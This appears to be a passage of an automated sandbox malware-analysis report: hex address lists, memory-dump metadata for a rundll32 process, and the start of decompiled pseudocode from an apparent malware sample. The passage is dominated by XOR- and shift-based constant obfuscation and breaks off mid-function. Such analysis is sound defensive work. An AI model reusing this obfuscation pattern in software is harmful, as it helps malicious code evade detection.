                                                                                                                                                            0x00382c74
                                                                                                                                                            0x00382c7c
                                                                                                                                                            0x00382c86
                                                                                                                                                            0x00382c8b
                                                                                                                                                            0x00382c91
                                                                                                                                                            0x00382c99
                                                                                                                                                            0x00382ca4
                                                                                                                                                            0x00382caf
                                                                                                                                                            0x00382cba
                                                                                                                                                            0x00382ccd
                                                                                                                                                            0x00382cce
                                                                                                                                                            0x00382cd5
                                                                                                                                                            0x00382ce0
                                                                                                                                                            0x00382cf3
                                                                                                                                                            0x00382cfa
                                                                                                                                                            0x00382d05
                                                                                                                                                            0x00382d10
                                                                                                                                                            0x00382d1e
                                                                                                                                                            0x00382d22
                                                                                                                                                            0x00382d2a
                                                                                                                                                            0x00382d2f
                                                                                                                                                            0x00382d37
                                                                                                                                                            0x00382d42
                                                                                                                                                            0x00382d4a
                                                                                                                                                            0x00382d55
                                                                                                                                                            0x00382d5d
                                                                                                                                                            0x00382d62
                                                                                                                                                            0x00382d67
                                                                                                                                                            0x00382d6f
                                                                                                                                                            0x00382d77
                                                                                                                                                            0x00382d82
                                                                                                                                                            0x00382d8d
                                                                                                                                                            0x00382d98
                                                                                                                                                            0x00382da3
                                                                                                                                                            0x00382dab
                                                                                                                                                            0x00382db3
                                                                                                                                                            0x00382dbc
                                                                                                                                                            0x00382dc0
                                                                                                                                                            0x00382dc8
                                                                                                                                                            0x00382dd3
                                                                                                                                                            0x00382dde
                                                                                                                                                            0x00382de9
                                                                                                                                                            0x00382df4
                                                                                                                                                            0x00382dff
                                                                                                                                                            0x00382e0a
                                                                                                                                                            0x00382e12
                                                                                                                                                            0x00382e1c
                                                                                                                                                            0x00382e20
                                                                                                                                                            0x00382e28
                                                                                                                                                            0x00382e30
                                                                                                                                                            0x00382e3b
                                                                                                                                                            0x00382e46
                                                                                                                                                            0x00382e51
                                                                                                                                                            0x00382e58
                                                                                                                                                            0x00382e63
                                                                                                                                                            0x00382e6e
                                                                                                                                                            0x00382e79
                                                                                                                                                            0x00382e84
                                                                                                                                                            0x00382e8f
                                                                                                                                                            0x00383717
                                                                                                                                                            0x00383722
                                                                                                                                                            0x0038372a
                                                                                                                                                            0x00383732
                                                                                                                                                            0x0038373a
                                                                                                                                                            0x00383742
                                                                                                                                                            0x0038374a
                                                                                                                                                            0x00383752
                                                                                                                                                            0x00383760
                                                                                                                                                            0x00383769
                                                                                                                                                            0x0038376d
                                                                                                                                                            0x0038376d
                                                                                                                                                            0x00383775
                                                                                                                                                            0x00383775
                                                                                                                                                            0x00383775
                                                                                                                                                            0x00383775
                                                                                                                                                            0x0038377b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00383781
                                                                                                                                                            0x00383c04
                                                                                                                                                            0x00383c09
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00383c09
                                                                                                                                                            0x00383787
                                                                                                                                                            0x0038378d
                                                                                                                                                            0x00383a80
                                                                                                                                                            0x00383a86
                                                                                                                                                            0x00383b54
                                                                                                                                                            0x00383b5a
                                                                                                                                                            0x00383bde
                                                                                                                                                            0x00383be3
                                                                                                                                                            0x00383be5
                                                                                                                                                            0x00383bf6
                                                                                                                                                            0x00383bf6
                                                                                                                                                            0x00383a28
                                                                                                                                                            0x00383a28
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00383a28
                                                                                                                                                            0x00383b5c
                                                                                                                                                            0x00383b62
                                                                                                                                                            0x00383baf
                                                                                                                                                            0x00383bbb
                                                                                                                                                            0x00383bc4
                                                                                                                                                            0x00383bcc
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00383bcc
                                                                                                                                                            0x00383b64
                                                                                                                                                            0x00383b6a
                                                                                                                                                            0x00383ba1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00383ba1
                                                                                                                                                            0x00383b6c
                                                                                                                                                            0x00383b6e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00383b90
                                                                                                                                                            0x00383b97
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00383b97
                                                                                                                                                            0x00383a8c
                                                                                                                                                            0x00383b3d
                                                                                                                                                            0x00383b42
                                                                                                                                                            0x00383b44
                                                                                                                                                            0x00384009
                                                                                                                                                            0x00384010
                                                                                                                                                            0x00384010
                                                                                                                                                            0x00383b4a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00383b4a
                                                                                                                                                            0x00383a92
                                                                                                                                                            0x00383a98
                                                                                                                                                            0x00383b0f
                                                                                                                                                            0x00383b21
                                                                                                                                                            0x00383b27
                                                                                                                                                            0x00383b28
                                                                                                                                                            0x00383b2f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00383b2f
                                                                                                                                                            0x00383a9a
                                                                                                                                                            0x00383aa0
                                                                                                                                                            0x00383ae5
                                                                                                                                                            0x00383aec
                                                                                                                                                            0x00383af1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00383af1
                                                                                                                                                            0x00383aa2
                                                                                                                                                            0x00383aa8
                                                                                                                                                            0x00383ad6
                                                                                                                                                            0x00383adb
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00383adb
                                                                                                                                                            0x00383aaa
                                                                                                                                                            0x00383ab0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00383ab6
                                                                                                                                                            0x00383abd
                                                                                                                                                            0x00383abf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00383abf
                                                                                                                                                            0x00383793
                                                                                                                                                            0x00383a70
                                                                                                                                                            0x00383a75
                                                                                                                                                            0x00383a76
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00383a76
                                                                                                                                                            0x00383799
                                                                                                                                                            0x0038379f
                                                                                                                                                            0x003838e1
                                                                                                                                                            0x003838e7
                                                                                                                                                            0x003839f9
                                                                                                                                                            0x00383a00
                                                                                                                                                            0x00383a02
                                                                                                                                                            0x00383a32
                                                                                                                                                            0x00383a39
                                                                                                                                                            0x00383a3c
                                                                                                                                                            0x00383a48
                                                                                                                                                            0x00383a4a
                                                                                                                                                            0x00383a51
                                                                                                                                                            0x00383a51
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00383a51
                                                                                                                                                            0x00383a4c
                                                                                                                                                            0x00383a4f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00383a4f
                                                                                                                                                            0x00383a3e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00383a3e
                                                                                                                                                            0x00383a1d
                                                                                                                                                            0x00383a23
                                                                                                                                                            0x00383a24
                                                                                                                                                            0x00383a26
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00383a26
                                                                                                                                                            0x003838ed
                                                                                                                                                            0x003838f3
                                                                                                                                                            0x00383fd7
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00383fdc
                                                                                                                                                            0x003838f9
                                                                                                                                                            0x003838ff
                                                                                                                                                            0x00383959
                                                                                                                                                            0x00383965
                                                                                                                                                            0x0038398e
                                                                                                                                                            0x00383995
                                                                                                                                                            0x0038399a
                                                                                                                                                            0x003839b7
                                                                                                                                                            0x003839bd
                                                                                                                                                            0x003839d5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003839da
                                                                                                                                                            0x00383901
                                                                                                                                                            0x00383907
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00383914
                                                                                                                                                            0x00383919
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00383919
                                                                                                                                                            0x003837a5
                                                                                                                                                            0x00383895
                                                                                                                                                            0x0038389a
                                                                                                                                                            0x0038389c
                                                                                                                                                            0x003838c5
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: )If$D}$D}$G$TRr$Y2($\Q$c{v$n)+$orh$rZM*${)t${)t$`$u#$xy
                                                                                                                                                            • API String ID: 0-2742041174
                                                                                                                                                            • Opcode ID: 52949e86ad8fdddc5435f22b8e478451765fb51eb273466d5dca35b46295798e
                                                                                                                                                            • Instruction ID: 0409c25692e88c5def5f8cadfad8279f4094b1aa6c8a1e0eb3270b27eec7b2e4
                                                                                                                                                            • Opcode Fuzzy Hash: 52949e86ad8fdddc5435f22b8e478451765fb51eb273466d5dca35b46295798e
                                                                                                                                                            • Instruction Fuzzy Hash: 35C212715083808BD3B9DF25C58ABCBBBE1BB84714F11895DE5DE9A260DBB09948CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                            			E00372BD9(intOrPtr __ecx) {
                                                                                                                                                            				char _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				char _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                            				char* _v60;
                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				char _v80;
                                                                                                                                                            				intOrPtr _v84;
                                                                                                                                                            				char _v88;
                                                                                                                                                            				char _v92;
                                                                                                                                                            				char _v96;
                                                                                                                                                            				signed int _v100;
                                                                                                                                                            				signed int _v104;
                                                                                                                                                            				signed int _v108;
                                                                                                                                                            				signed int _v112;
                                                                                                                                                            				signed int _v116;
                                                                                                                                                            				signed int _v120;
                                                                                                                                                            				signed int _v124;
                                                                                                                                                            				signed int _v128;
                                                                                                                                                            				signed int _v132;
                                                                                                                                                            				signed int _v136;
                                                                                                                                                            				signed int _v140;
                                                                                                                                                            				signed int _v144;
                                                                                                                                                            				signed int _v148;
                                                                                                                                                            				signed int _v152;
                                                                                                                                                            				signed int _v156;
                                                                                                                                                            				signed int _v160;
                                                                                                                                                            				signed int _v164;
                                                                                                                                                            				signed int _v168;
                                                                                                                                                            				signed int _v172;
                                                                                                                                                            				signed int _v176;
                                                                                                                                                            				signed int _v180;
                                                                                                                                                            				signed int _v184;
                                                                                                                                                            				unsigned int _v188;
                                                                                                                                                            				signed int _v192;
                                                                                                                                                            				signed int _v196;
                                                                                                                                                            				signed int _v200;
                                                                                                                                                            				signed int _v204;
                                                                                                                                                            				signed int _v208;
                                                                                                                                                            				signed int _v212;
                                                                                                                                                            				signed int _v216;
                                                                                                                                                            				signed int _v220;
                                                                                                                                                            				signed int _v224;
                                                                                                                                                            				signed int _v228;
                                                                                                                                                            				signed int _v232;
                                                                                                                                                            				signed int _v236;
                                                                                                                                                            				signed int _v240;
                                                                                                                                                            				signed int _v244;
                                                                                                                                                            				signed int _v248;
                                                                                                                                                            				signed int _v252;
                                                                                                                                                            				signed int _v256;
                                                                                                                                                            				signed int _v260;
                                                                                                                                                            				signed int _v264;
                                                                                                                                                            				signed int _v268;
                                                                                                                                                            				signed int _v272;
                                                                                                                                                            				signed int _v276;
                                                                                                                                                            				signed int _v280;
                                                                                                                                                            				signed int _v284;
                                                                                                                                                            				signed int _v288;
                                                                                                                                                            				signed int _v292;
                                                                                                                                                            				signed int _v296;
                                                                                                                                                            				signed int _v300;
                                                                                                                                                            				signed int _v304;
                                                                                                                                                            				signed int _v308;
                                                                                                                                                            				signed int _v312;
                                                                                                                                                            				signed int _v316;
                                                                                                                                                            				signed int _v320;
                                                                                                                                                            				signed int _v324;
                                                                                                                                                            				signed int _v328;
                                                                                                                                                            				signed int _v332;
                                                                                                                                                            				signed int _v336;
                                                                                                                                                            				signed int _v340;
                                                                                                                                                            				signed int _v344;
                                                                                                                                                            				signed int _v348;
                                                                                                                                                            				signed int _v352;
                                                                                                                                                            				signed int _v356;
                                                                                                                                                            				signed int _v360;
                                                                                                                                                            				signed int _v364;
                                                                                                                                                            				signed int _v368;
                                                                                                                                                            				signed int _v372;
                                                                                                                                                            				signed int _v376;
                                                                                                                                                            				signed int _v380;
                                                                                                                                                            				signed int _v384;
                                                                                                                                                            				signed int _v388;
                                                                                                                                                            				signed int _v392;
                                                                                                                                                            				signed int _v396;
                                                                                                                                                            				void* _t716;
                                                                                                                                                            				void* _t717;
                                                                                                                                                            				void* _t718;
                                                                                                                                                            				intOrPtr _t730;
                                                                                                                                                            				intOrPtr _t732;
                                                                                                                                                            				void* _t733;
                                                                                                                                                            				signed int _t735;
                                                                                                                                                            				void* _t741;
                                                                                                                                                            				intOrPtr _t746;
                                                                                                                                                            				intOrPtr _t752;
                                                                                                                                                            				intOrPtr _t754;
                                                                                                                                                            				intOrPtr _t755;
                                                                                                                                                            				void* _t757;
                                                                                                                                                            				void* _t759;
                                                                                                                                                            				intOrPtr _t760;
                                                                                                                                                            				void* _t766;
                                                                                                                                                            				signed int _t772;
                                                                                                                                                            				signed int _t773;
                                                                                                                                                            				signed int _t774;
                                                                                                                                                            				signed int _t775;
                                                                                                                                                            				signed int _t776;
                                                                                                                                                            				signed int _t777;
                                                                                                                                                            				signed int _t778;
                                                                                                                                                            				signed int _t779;
                                                                                                                                                            				signed int _t780;
                                                                                                                                                            				signed int _t781;
                                                                                                                                                            				signed int _t782;
                                                                                                                                                            				void* _t783;
                                                                                                                                                            				intOrPtr _t792;
                                                                                                                                                            				void* _t807;
                                                                                                                                                            				void* _t812;
                                                                                                                                                            				void* _t842;
                                                                                                                                                            				intOrPtr _t848;
                                                                                                                                                            				void* _t864;
                                                                                                                                                            				intOrPtr _t866;
                                                                                                                                                            				signed int _t867;
                                                                                                                                                            				void* _t868;
                                                                                                                                                            				void* _t873;
                                                                                                                                                            				signed int* _t875;
                                                                                                                                                            				void* _t878;
                                                                                                                                                            
                                                                                                                                                            				_t875 =  &_v396;
                                                                                                                                                            				_v56 = 0xa0cd19;
                                                                                                                                                            				_t873 = 0;
                                                                                                                                                            				_v84 = __ecx;
                                                                                                                                                            				_v52 = _v52 & 0;
                                                                                                                                                            				_t766 = 0x41de8e2;
                                                                                                                                                            				_v48 = _v48 & 0;
                                                                                                                                                            				_v300 = 0x1109eb;
                                                                                                                                                            				_v300 = _v300 + 0xcb;
                                                                                                                                                            				_v300 = _v300 | 0xecff95c2;
                                                                                                                                                            				_v300 = _v300 ^ 0xa1bddbbd;
                                                                                                                                                            				_v252 = 0xe28eec;
                                                                                                                                                            				_v252 = _v252 + 0x19d6;
                                                                                                                                                            				_v252 = _v252 | 0xcaf404bd;
                                                                                                                                                            				_v252 = _v252 ^ 0xcaf6acfe;
                                                                                                                                                            				_v124 = 0x517500;
                                                                                                                                                            				_v124 = _v124 + 0x84ec;
                                                                                                                                                            				_v124 = _v124 ^ 0x0051f9ec;
                                                                                                                                                            				_v344 = 0xbde49;
                                                                                                                                                            				_t772 = 0x31;
                                                                                                                                                            				_v344 = _v344 * 0x35;
                                                                                                                                                            				_v344 = _v344 << 9;
                                                                                                                                                            				_v344 = _v344 + 0x7afe;
                                                                                                                                                            				_v344 = _v344 ^ 0xea0ab4fe;
                                                                                                                                                            				_v232 = 0xd06c4e;
                                                                                                                                                            				_v232 = _v232 | 0x98bd8447;
                                                                                                                                                            				_v232 = _v232 + 0xffff492f;
                                                                                                                                                            				_v232 = _v232 ^ 0x98fd357e;
                                                                                                                                                            				_v236 = 0xf2a19d;
                                                                                                                                                            				_v236 = _v236 << 8;
                                                                                                                                                            				_v236 = _v236 | 0xeb063d66;
                                                                                                                                                            				_v236 = _v236 ^ 0xfba7bd66;
                                                                                                                                                            				_v304 = 0x7cba75;
                                                                                                                                                            				_v304 = _v304 << 0x10;
                                                                                                                                                            				_v304 = _v304 >> 0xd;
                                                                                                                                                            				_v304 = _v304 ^ 0x0005d3a8;
                                                                                                                                                            				_v220 = 0xced2db;
                                                                                                                                                            				_v220 = _v220 >> 0xb;
                                                                                                                                                            				_v220 = _v220 * 0x6a;
                                                                                                                                                            				_v220 = _v220 ^ 0x000ab444;
                                                                                                                                                            				_v356 = 0x98a5e4;
                                                                                                                                                            				_v356 = _v356 ^ 0xdd9204f6;
                                                                                                                                                            				_v356 = _v356 | 0x4689a95f;
                                                                                                                                                            				_v356 = _v356 * 0x48;
                                                                                                                                                            				_v356 = _v356 ^ 0xdf47a2b8;
                                                                                                                                                            				_v292 = 0x99ac6b;
                                                                                                                                                            				_v292 = _v292 * 0x35;
                                                                                                                                                            				_v292 = _v292 / _t772;
                                                                                                                                                            				_v292 = _v292 ^ 0x00a637e1;
                                                                                                                                                            				_v348 = 0x8d86f8;
                                                                                                                                                            				_v348 = _v348 + 0x9ec9;
                                                                                                                                                            				_v348 = _v348 + 0xfffff441;
                                                                                                                                                            				_v348 = _v348 * 0x3a;
                                                                                                                                                            				_v348 = _v348 ^ 0x2031e474;
                                                                                                                                                            				_v208 = 0x39dd97;
                                                                                                                                                            				_v208 = _v208 << 0x10;
                                                                                                                                                            				_v208 = _v208 + 0x9a19;
                                                                                                                                                            				_v208 = _v208 ^ 0xdd979a19;
                                                                                                                                                            				_v100 = 0xd2197;
                                                                                                                                                            				_v100 = _v100 + 0x97e4;
                                                                                                                                                            				_v100 = _v100 ^ 0x000db95b;
                                                                                                                                                            				_v324 = 0x771ce;
                                                                                                                                                            				_v324 = _v324 << 1;
                                                                                                                                                            				_v324 = _v324 ^ 0x580a954c;
                                                                                                                                                            				_v324 = _v324 ^ 0x580cba62;
                                                                                                                                                            				_v352 = 0xd79a55;
                                                                                                                                                            				_t867 = 0x4d;
                                                                                                                                                            				_v352 = _v352 / _t867;
                                                                                                                                                            				_v352 = _v352 << 5;
                                                                                                                                                            				_v352 = _v352 + 0xffffa0ed;
                                                                                                                                                            				_v352 = _v352 ^ 0x005b1fb1;
                                                                                                                                                            				_v264 = 0xbc6795;
                                                                                                                                                            				_v264 = _v264 + 0x99f5;
                                                                                                                                                            				_v264 = _v264 | 0xde86e00c;
                                                                                                                                                            				_v264 = _v264 ^ 0xdeb9ffad;
                                                                                                                                                            				_v240 = 0x2649df;
                                                                                                                                                            				_v240 = _v240 + 0x8f57;
                                                                                                                                                            				_v240 = _v240 + 0xffffdcf3;
                                                                                                                                                            				_v240 = _v240 ^ 0x002859eb;
                                                                                                                                                            				_v180 = 0x284ff;
                                                                                                                                                            				_v180 = _v180 + 0xfffffbe4;
                                                                                                                                                            				_v180 = _v180 ^ 0x0004b053;
                                                                                                                                                            				_v248 = 0x43d81c;
                                                                                                                                                            				_t773 = 0x2c;
                                                                                                                                                            				_v248 = _v248 * 0x30;
                                                                                                                                                            				_v248 = _v248 + 0x77f1;
                                                                                                                                                            				_v248 = _v248 ^ 0x0cb65cea;
                                                                                                                                                            				_v164 = 0x561af9;
                                                                                                                                                            				_v164 = _v164 * 0x5f;
                                                                                                                                                            				_v164 = _v164 ^ 0x1ff767f2;
                                                                                                                                                            				_v172 = 0x424117;
                                                                                                                                                            				_v172 = _v172 / _t773;
                                                                                                                                                            				_v172 = _v172 ^ 0x000edcdb;
                                                                                                                                                            				_v336 = 0xedf003;
                                                                                                                                                            				_v336 = _v336 + 0xffff11da;
                                                                                                                                                            				_v336 = _v336 >> 2;
                                                                                                                                                            				_v336 = _v336 >> 9;
                                                                                                                                                            				_v336 = _v336 ^ 0x000c05d4;
                                                                                                                                                            				_v216 = 0xec53cc;
                                                                                                                                                            				_v216 = _v216 | 0x30e2710b;
                                                                                                                                                            				_v216 = _v216 * 0x1f;
                                                                                                                                                            				_v216 = _v216 ^ 0xeced0588;
                                                                                                                                                            				_v224 = 0xc36dcc;
                                                                                                                                                            				_v224 = _v224 * 0x64;
                                                                                                                                                            				_v224 = _v224 * 0xc;
                                                                                                                                                            				_v224 = _v224 ^ 0x9413d5fd;
                                                                                                                                                            				_v148 = 0x5fde01;
                                                                                                                                                            				_v148 = _v148 ^ 0x51967584;
                                                                                                                                                            				_v148 = _v148 ^ 0x51c7dbee;
                                                                                                                                                            				_v156 = 0x26546c;
                                                                                                                                                            				_v156 = _v156 ^ 0x8ec08bcd;
                                                                                                                                                            				_v156 = _v156 ^ 0x8eeee361;
                                                                                                                                                            				_v396 = 0x210674;
                                                                                                                                                            				_v396 = _v396 ^ 0xb585172f;
                                                                                                                                                            				_v396 = _v396 >> 9;
                                                                                                                                                            				_v396 = _v396 ^ 0x5fa8c9ed;
                                                                                                                                                            				_v396 = _v396 ^ 0x5ff25ba7;
                                                                                                                                                            				_v112 = 0xa4fdb5;
                                                                                                                                                            				_v112 = _v112 ^ 0x7ac22777;
                                                                                                                                                            				_v112 = _v112 ^ 0x7a606cfd;
                                                                                                                                                            				_v160 = 0x7fe066;
                                                                                                                                                            				_v160 = _v160 | 0xe6d7910f;
                                                                                                                                                            				_v160 = _v160 ^ 0xe6fe40a3;
                                                                                                                                                            				_v152 = 0xb045a1;
                                                                                                                                                            				_v152 = _v152 ^ 0x0733bf74;
                                                                                                                                                            				_v152 = _v152 ^ 0x078d93a6;
                                                                                                                                                            				_v384 = 0x7bd524;
                                                                                                                                                            				_v384 = _v384 + 0xffff236c;
                                                                                                                                                            				_v384 = _v384 * 0x7b;
                                                                                                                                                            				_v384 = _v384 + 0xffffb98b;
                                                                                                                                                            				_v384 = _v384 ^ 0x3b1735e1;
                                                                                                                                                            				_v392 = 0x61d9a1;
                                                                                                                                                            				_v392 = _v392 + 0xab93;
                                                                                                                                                            				_v392 = _v392 + 0xffff054c;
                                                                                                                                                            				_v392 = _v392 | 0xc62dc39c;
                                                                                                                                                            				_v392 = _v392 ^ 0xc661791a;
                                                                                                                                                            				_v376 = 0x1528d1;
                                                                                                                                                            				_v376 = _v376 << 8;
                                                                                                                                                            				_v376 = _v376 + 0xffff31a1;
                                                                                                                                                            				_v376 = _v376 >> 9;
                                                                                                                                                            				_v376 = _v376 ^ 0x000f3b72;
                                                                                                                                                            				_v268 = 0x199e3d;
                                                                                                                                                            				_v268 = _v268 ^ 0x3c18ecc0;
                                                                                                                                                            				_v268 = _v268 >> 0xf;
                                                                                                                                                            				_v268 = _v268 ^ 0x00085298;
                                                                                                                                                            				_v116 = 0x9d324d;
                                                                                                                                                            				_t774 = 0x5b;
                                                                                                                                                            				_v116 = _v116 * 0x35;
                                                                                                                                                            				_v116 = _v116 ^ 0x2088a224;
                                                                                                                                                            				_v144 = 0xea008e;
                                                                                                                                                            				_v144 = _v144 * 0x31;
                                                                                                                                                            				_v144 = _v144 ^ 0x2cc3d943;
                                                                                                                                                            				_v200 = 0xbe23d7;
                                                                                                                                                            				_v200 = _v200 / _t774;
                                                                                                                                                            				_v200 = _v200 ^ 0x0006a720;
                                                                                                                                                            				_v368 = 0xbc3a01;
                                                                                                                                                            				_v368 = _v368 >> 2;
                                                                                                                                                            				_v368 = _v368 << 1;
                                                                                                                                                            				_v368 = _v368 | 0x91e27348;
                                                                                                                                                            				_v368 = _v368 ^ 0x91f48308;
                                                                                                                                                            				_v312 = 0x81ba05;
                                                                                                                                                            				_v312 = _v312 ^ 0x6d6d273d;
                                                                                                                                                            				_v312 = _v312 + 0x9af1;
                                                                                                                                                            				_v312 = _v312 ^ 0x6ded9aad;
                                                                                                                                                            				_v320 = 0xa9a2ca;
                                                                                                                                                            				_v320 = _v320 / _t867;
                                                                                                                                                            				_t775 = 0x39;
                                                                                                                                                            				_v320 = _v320 / _t775;
                                                                                                                                                            				_v320 = _v320 ^ 0x0005ef3e;
                                                                                                                                                            				_v136 = 0x8e55db;
                                                                                                                                                            				_t776 = 0xb;
                                                                                                                                                            				_v136 = _v136 / _t776;
                                                                                                                                                            				_v136 = _v136 ^ 0x00010f6d;
                                                                                                                                                            				_v296 = 0x9a02a3;
                                                                                                                                                            				_v296 = _v296 | 0xc0bbeea6;
                                                                                                                                                            				_v296 = _v296 ^ 0xfebfff47;
                                                                                                                                                            				_v296 = _v296 ^ 0x3e0de8e7;
                                                                                                                                                            				_v196 = 0x628794;
                                                                                                                                                            				_v196 = _v196 >> 7;
                                                                                                                                                            				_v196 = _v196 ^ 0x00033c53;
                                                                                                                                                            				_v360 = 0xc75687;
                                                                                                                                                            				_t777 = 0x55;
                                                                                                                                                            				_v360 = _v360 / _t777;
                                                                                                                                                            				_t778 = 0x4a;
                                                                                                                                                            				_v360 = _v360 / _t778;
                                                                                                                                                            				_t779 = 0x66;
                                                                                                                                                            				_v360 = _v360 / _t779;
                                                                                                                                                            				_v360 = _v360 ^ 0x0006bc1c;
                                                                                                                                                            				_v288 = 0xb89ddb;
                                                                                                                                                            				_t780 = 0x5c;
                                                                                                                                                            				_v288 = _v288 * 0x7b;
                                                                                                                                                            				_v288 = _v288 + 0x220a;
                                                                                                                                                            				_v288 = _v288 ^ 0x58b2320e;
                                                                                                                                                            				_v108 = 0x352a49;
                                                                                                                                                            				_v108 = _v108 | 0x42677ea4;
                                                                                                                                                            				_v108 = _v108 ^ 0x427d3f06;
                                                                                                                                                            				_v332 = 0x1123f9;
                                                                                                                                                            				_v332 = _v332 + 0xfffffbdd;
                                                                                                                                                            				_v332 = _v332 + 0xffff8b7f;
                                                                                                                                                            				_v332 = _v332 | 0xcf6269e1;
                                                                                                                                                            				_v332 = _v332 ^ 0xcf7a63e7;
                                                                                                                                                            				_v192 = 0x15ba5c;
                                                                                                                                                            				_v192 = _v192 + 0xffff7d63;
                                                                                                                                                            				_v192 = _v192 ^ 0x0011de47;
                                                                                                                                                            				_v204 = 0xd88287;
                                                                                                                                                            				_v204 = _v204 >> 1;
                                                                                                                                                            				_v204 = _v204 ^ 0x006fcfd9;
                                                                                                                                                            				_v308 = 0x394063;
                                                                                                                                                            				_v308 = _v308 | 0x23438f89;
                                                                                                                                                            				_v308 = _v308 ^ 0x95557e79;
                                                                                                                                                            				_v308 = _v308 ^ 0xb625da34;
                                                                                                                                                            				_v260 = 0x6632ca;
                                                                                                                                                            				_v260 = _v260 << 0xc;
                                                                                                                                                            				_v260 = _v260 / _t780;
                                                                                                                                                            				_v260 = _v260 ^ 0x011a1b64;
                                                                                                                                                            				_v316 = 0x1ead1d;
                                                                                                                                                            				_v316 = _v316 >> 0xf;
                                                                                                                                                            				_v316 = _v316 << 0xe;
                                                                                                                                                            				_v316 = _v316 ^ 0x000acc6a;
                                                                                                                                                            				_v388 = 0xc01c7d;
                                                                                                                                                            				_v388 = _v388 >> 9;
                                                                                                                                                            				_v388 = _v388 | 0xa159bc3f;
                                                                                                                                                            				_v388 = _v388 ^ 0x1058b9c4;
                                                                                                                                                            				_v388 = _v388 ^ 0xb10bd724;
                                                                                                                                                            				_v256 = 0x2459a9;
                                                                                                                                                            				_v256 = _v256 + 0xffff58c0;
                                                                                                                                                            				_v256 = _v256 >> 0xc;
                                                                                                                                                            				_v256 = _v256 ^ 0x000386a3;
                                                                                                                                                            				_v340 = 0xa38d0b;
                                                                                                                                                            				_t781 = 0x78;
                                                                                                                                                            				_v340 = _v340 / _t781;
                                                                                                                                                            				_v340 = _v340 ^ 0x3e3bd45c;
                                                                                                                                                            				_v340 = _v340 + 0xf3c0;
                                                                                                                                                            				_v340 = _v340 ^ 0x3e3a819a;
                                                                                                                                                            				_v380 = 0x2dd945;
                                                                                                                                                            				_v380 = _v380 << 4;
                                                                                                                                                            				_v380 = _v380 + 0xffffb7c2;
                                                                                                                                                            				_v380 = _v380 << 6;
                                                                                                                                                            				_v380 = _v380 ^ 0xb75574a7;
                                                                                                                                                            				_v272 = 0xf6939e;
                                                                                                                                                            				_v272 = _v272 | 0x851c2f86;
                                                                                                                                                            				_v272 = _v272 + 0xffff0412;
                                                                                                                                                            				_v272 = _v272 ^ 0x85fd1a3b;
                                                                                                                                                            				_v188 = 0x2c17e;
                                                                                                                                                            				_v188 = _v188 >> 3;
                                                                                                                                                            				_v188 = _v188 ^ 0x000c5ae0;
                                                                                                                                                            				_v280 = 0xf08b81;
                                                                                                                                                            				_v280 = _v280 | 0x75266007;
                                                                                                                                                            				_v280 = _v280 ^ 0xc75f894a;
                                                                                                                                                            				_v280 = _v280 ^ 0xb2a4e63e;
                                                                                                                                                            				_v372 = 0x6f48a0;
                                                                                                                                                            				_v372 = _v372 << 0xa;
                                                                                                                                                            				_v372 = _v372 >> 0x10;
                                                                                                                                                            				_v372 = _v372 | 0x5e122b7b;
                                                                                                                                                            				_v372 = _v372 ^ 0x5e16ce05;
                                                                                                                                                            				_v184 = 0x747075;
                                                                                                                                                            				_v184 = _v184 + 0xcea0;
                                                                                                                                                            				_v184 = _v184 ^ 0x007a5d3b;
                                                                                                                                                            				_v128 = 0x4ebeca;
                                                                                                                                                            				_v128 = _v128 + 0xffffee54;
                                                                                                                                                            				_v128 = _v128 ^ 0x004a846f;
                                                                                                                                                            				_v120 = 0xe78fe5;
                                                                                                                                                            				_t868 = 0x80c65ec;
                                                                                                                                                            				_v120 = _v120 + 0xffff4f7b;
                                                                                                                                                            				_t864 = 0xf9e92c1;
                                                                                                                                                            				_v120 = _v120 ^ 0x00e2ece2;
                                                                                                                                                            				_v276 = 0xe2917e;
                                                                                                                                                            				_v276 = _v276 << 6;
                                                                                                                                                            				_v276 = _v276 + 0xffff0dfb;
                                                                                                                                                            				_v276 = _v276 ^ 0x38a72339;
                                                                                                                                                            				_v176 = 0x1ec236;
